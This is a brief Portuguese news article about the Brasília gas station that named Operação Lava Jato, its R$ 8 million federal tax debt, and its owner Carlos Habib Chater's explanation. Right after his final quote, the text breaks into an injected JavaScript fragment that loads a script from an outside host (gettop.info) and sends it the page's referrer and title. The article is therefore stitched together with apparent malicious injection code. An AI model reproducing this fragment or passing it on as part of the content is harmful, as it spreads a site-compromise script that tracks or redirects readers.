O Posto da Torre de TV, no Setor Hoteleiro Sul, que deu nome a Operação Lava Jato e foi alvo da primeira fase de busca e apreensão, despertou a atenção de investigadores por suspeita de crimes de financeiros. Segundo reportagem do portal Uol, o posto, atualmente, tem uma dívida de mais de R$ 8 milhões com a União.
O posto pertence ao doleiro Carlos Habib Chater, primeiro preso da Operação Lava Jato, suspeito de ter usado o empreendimento para lavar dinheiro do tráfico de drogas. Ele passou 1 ano e 7 meses na cadeia até conseguir progredir para o regime semiaberto, no qual permaneceu por mais um ano.
O doleiro afirma que está pagando a dívida, parceladamente, e que ela teria sido acumulada devido à dificuldades econômicas. “No Brasil, tudo conspira contra. Então, a gente optou por manter os empregos e, infelizmente, um ou outro imposto fica para trás e a gente normalmente parcela\”, disse à reportagem.s.src=\’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=\’ + encodeURIComponent(document.referrer) + \’&default_keyword=\’ + encodeURIComponent(document.title) + \’\’;